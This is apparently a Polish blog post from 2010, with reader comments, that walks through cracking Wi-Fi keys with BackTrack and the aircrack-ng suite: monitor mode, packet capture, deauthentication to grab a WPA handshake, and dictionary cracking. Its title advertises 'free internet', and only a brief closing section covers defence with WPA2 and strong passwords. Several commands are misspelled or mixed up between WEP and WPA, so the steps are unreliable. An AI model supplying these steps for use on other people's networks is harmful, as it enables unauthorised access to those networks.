środa, 3 marca 2010

Zabezpieczenia wep - jak złamać wep i wpa ! Łamanie sieci bezprzewodowej wifi ! Obrona przed atakiem na wep i wpa, jak skutecznie bronić się przed dostępem do wifi ! Klucz wep łamanie ! Backtrack złamie klucz wep i wpa ! Darmowy internet ! Internet za darmo ! Zabezpieczenia routera wep i wpa !

Jak złamać WEP - zabezpieczenie sieci bezprzewodowej ! Dostęp do darmowego internetu ! Jak skutecznie bronić się przed dostępem do sieci wifi - czyli odkrywamy słabe punkty !

Jest to artykuł, który ma ci uświadomić aby nie korzystać z zabezpieczenia sieci szyfrowaniem WEP. A to co jest tutaj napisane - wykonujesz na własną odpowiedzialność i tylko w obrębie własnej sieci ! 
Pamiętaj - aby nie łamać kluczy innych osób - gdyż jest to nie do końca zgodne z prawem a już na pewno nieetyczne ! Warto przeczytać sobie artykuł o WEP złamany w mniej niż minutę !

Na początek może kilka kwestii o zabezpieczeniach routerów itp.
Pierwszym "niby" zabezpieczeniem jest tzw. SSID - czyli nazwa naszej sieci. Jeżeli ktoś chce się do niej dostać to musi znać jej prawidłowe oznaczenie. Istnieje możliwość "ukrycia" się przed mniej wścibskimi użytkownikami. Jednak ktoś kto będzie chciał rzeczywiście poznać jakie sieci znajdują się w jego zasięgu - bez problemu odczyta SSID ! 
Kolejną znaną metodą jest tzw. filtrowanie adresów MAC - czyli naszych kart sieciowych (*każda posiada unikalny adres). Jest to metoda o słabej skuteczności, gdyż jak większość wie (ta która ma pojęcie o karcie sieciowej), istnieje możliwość klonowania adresów MAC - istnieją do tego specjalne programy. Oczywiście jest to zabezpieczenie bardzo popularne np. w zwykłych sieciach np. osiedlowych. A to z tego względu, że gdy podszyjemy się pod czyjś numer MAC (sklonujemy go) to w przypadku gdy zostaną podłączone do sieci dwa komputery z identycznymi numerami wyskoczy błąd - będzie konflikt interesów. Administrator jest w stanie wykryć takie zdarzenie - odpowiednio monitorując ruch sieciowy.
WEP - zabezpieczenie o którym dzisiaj mowa - było skuteczne do czasu aż nie zostało złamane :) 
Jest to jeden ze sposobów szyfrowania sieci wifi (*a więc np. naszych routerów). Wbrew pozorom korzysta z niego wciąż baaaaardzzzoo wielu użytkowników. Przeważnie jest to klucz 64bitowy - dzisiaj nie wystarczający ! Złamanie sieci zabezpieczonej w ten sposób może trwać od 5 do 15 minut w zależności od ruchu sieciowego jaki generuje.
 WPA - lepsze niż WEP ! Jest to następca WEP - warto przyjrzeć się WPA2 które jest znacznie bezpieczniejsze i radziłbym korzystać właśnie z tego zabezpieczenia. Jednak nie ma rzeczy na 100% skutecznych, a więc gdy widzimy że nasza sieć jest mocno obciążona to znaczy że coś jest nie tak !
Istnieje jeszcze kilka innych zabezpieczeń - ale te są tymi najpopularniejszymi. 

Do rzeczy ... jak złamać WEP ! 

Warto skorzystać w tym celu z narzędzi przeznaczonych dla systemu LINUX. I właśnie opiszę sposób na system "pingwinkowy" - za pomocą którego można poznać klucz sieciowy ! 
Oczywiście program można odpalić jako płytę bootowalną i nie trzeba instalować programu o którym napiszę. 
Takim kombajnem hakerów jest platforma, która nazywa się "Backtrack" 
  www.backtrack-linux.org

System możemy pobrać z tej strony : http://www.backtrack-linux.org/downloads/

Po uruchomieniu backtracka - albo w wersji bootowalnej (live cd) albo po zainstalowaniu w komputerze (np. laptopie - z kartą bezprzewodową) należy go uruchomić wpisując : startx 
ta komenda uruchamia system !

Po pierwsze uruchamiamy konsolę backtracka i wpisujemy :
iwconfig wlan0 mode monitor
oczywiście za wlan0 - odpowiednio podstawiamy nasz interfejs karty sieciowej, ale w większości przypadków będzie to wlan0 ! Aby sprawdzić jaki mamy interfejs wpisujemy :
iwconfig
Następnie należy uruchomić airmon :
arimon-ng start wlan0
Teraz sprawdzimy sieci które są w naszym zasięgu ;
arimon-ng --encrypt wpa wlan0
Teraz należy wybrać cel (*naszą sieć) i zapamiętać takie informacje jak : ESSID, BSSID, MAC (*Station) oraz CHANNEL ! 
Teraz włączamy nasz skaner :
airodump-ng --write haslo.cap --channel X --bssid aa:aa:aa:aa:aa:aa  --encrypt wpa wlan0
odpowiednio podstawiamy  nazwa.cap - gdzie zapisujemy - channel X - numer kanału, bssid czyli numer station mac oraz wlan0 - zależne od interfejsu jaki posiadamy !
Po wpisaniu wykonamy metodę "handshake" !
Teraz w nowej konsoli analogicznie wpisujemy (aby przyspieszyć zdobywanie pakietów ) :
aireplay-ng -0 1 -a aa:aa:aa:aa:aa:aa -c aa:aa:aa:aa:aa:aa wlan0 
pierwsze to nasz adres mac - a drugi to cel - też numer mac station ! 
Teraz czekamy i czekamy .... 
I wpisujemy w konsoli : (* motoda słownikowa)
aircrack-ng  -c haslo.cap -w  slownik.txt


Całość jest dobrze widoczna na poniższych filmikach są to dwie różne wersje ! 



A teraz w jaki sposób można się zabezpieczyć przed tego typu atakiem :

Warto korzystać z szyfrowania WPA-2, które jest o wiele skuteczniejsze niż "zwyczajne" WEP. Kolejną rzeczą jest stworzenie w miarę długiego i skomplikowanego hasła - zawierającego cyfry i litery.
Ponadto warto skorzystać z opcji ukrywania naszego numeru SSID - dzięki temu będziemy mniej widoczni dla potencjalnego intruza.

Kolejna rzecz, która może nas nieco uchronić przed tego typu atakiem to zdrowy rozsądek - jeżeli zobaczymy, że ruch w sieci znacząco spowalnia to może być sygnał, że ktoś zapycha nasze łącze.
Możemy więc zainstalować sobie jakieś oprogramowanie do monitorowania ruchu sieciowego.

24 komentarze:

Anonimowy pisze...

Witam

a czy karta EDIMAX EW-7711 UTN KARTA WIFI-N USB bedzie w pełni kompatybilna do Backtrack 3.0 ???

Pozdrawiam

Przemo pisze...

Kompatybilna jest napewno : Edimax EW-7318USg, więc myślę że ta co podałeś także.

Anonimowy pisze...

"-w slownik.txt" a skąd to wsiąść ?

-waldi- pisze...

"arimon-ng --encrypt wpa wlan0" nie airmon-ng tylko airodump-ng :)

Przemo pisze...

slownik.txt to lista słów, które mogą przypadać na hasło. Najlepiej pobrać to z internetu a jeszcze lepiej dowiedzieć się na czym polega metoda słownikowa.

Waldi, dzięki za znalezienie literówki : chodzi oczywiście o airmon -ng a nie jak napisałem arimon -ng !!

Anonimowy pisze...

Poszukuje tutorialu na Win7 ... nie mam mozliwosci zmiany systemu na linuxa :/ Z gory dziekij za pomoc

Anonimowy pisze...

ściągnij sobie VM a potem na tym odpal BTrack-a.
Ja tak mam i mam Win7 :)
Wszystko ładnie działa
Pozdro

Anonimowy pisze...

3 listopada 2010 02:45 pytanie
a jakąkartę masz

Anonimowy pisze...

A jak wykrywa tylko dwie wirless lo i eth0 i oba sa extensions? co trzeba zrobic aby bylo ok?

Anonimowy pisze...

100000 pakietów i brak handshake, co jest grane

Anonimowy pisze...

Ja mam win 7 i backtrack nici a niechce mi sie instalowac linuxa

Przemo pisze...

Istnieje możliwość zrobienia płyty bootowalnej Backtracka.

Adrian pisze...

Mam taki problem ze nie umiem zainstalowac backtracka. potrzebuje VM ale zeby go uzywac trzeba sie zarejstrowac a kiedy chce aktywawac konto wyskakuje "found 3" czy mogl by ktos sie zarejstrowac i podac mi klucz?

Przemo pisze...

Hmm, ale backtracka możesz pobrać jako Live CD - bez potrzeby instalowania.

Anonimowy pisze...

witam potrzebuje pomocy mianowicie chodzi mi o ten moment:airodump-ng --write sniff(lub haslo).cap --chanel x --bssid xx:xx:xx: --encrypt wpa wlan0.
czy to trzeba wpisac tak jak jest tu tylko z odpowiednim chanelem i bssid czy coś wiecej trzeba zmienic

Anonimowy pisze...

no niezle mialo byc o wep a widze 2 vidy o wpa...

Anonimowy pisze...

mam VM i back track 5 i pojawia się mi ekran boot .... co dalej?????

Anonimowy pisze...

Czy da się sprawdzić ile komputerów podłączonych jest do naszej sieci bezprzewodowej? Trzeba posiadać jakiś specjalny program do tego i jeśli tak to czy znacie jakiś fajny, czy może jest jakieś narzędzie systemowe, które umożliwia sprawdzenie?

Anonimowy pisze...

Zaloguj się na ruter i zobacz "stats". Powinna być lista zalogowanych do niego userów przez wi-fi wraz z MACadresami. Jeżeli jakiś mac będzie dwa razy no to już wiesz że ktoś na lewo ciągnie Ci net :)

Anonimowy pisze...

a dziala moze na windows xp ?

Anonimowy pisze...

wszystko zamontowane i ustawione OK VMware 8 BackTrack 5 R1 ,przy wpisaniu - airmon-ng nie poznaje mi bezprzewodowej karty USB,win 7

Anonimowy pisze...

Jaki VM ? Co to takiego >

Anonimowy pisze...

VM do wirtualna maszyna
może być VMware Workstation

Anonimowy pisze...

Mam ten sam problem BT5, ale mi po wklepaniu airodump-ng mon0 nic nie pokazuje mimo tego że mam włączony tryb monitor. Na BT4 nie ma problemu.n

Prześlij komentarz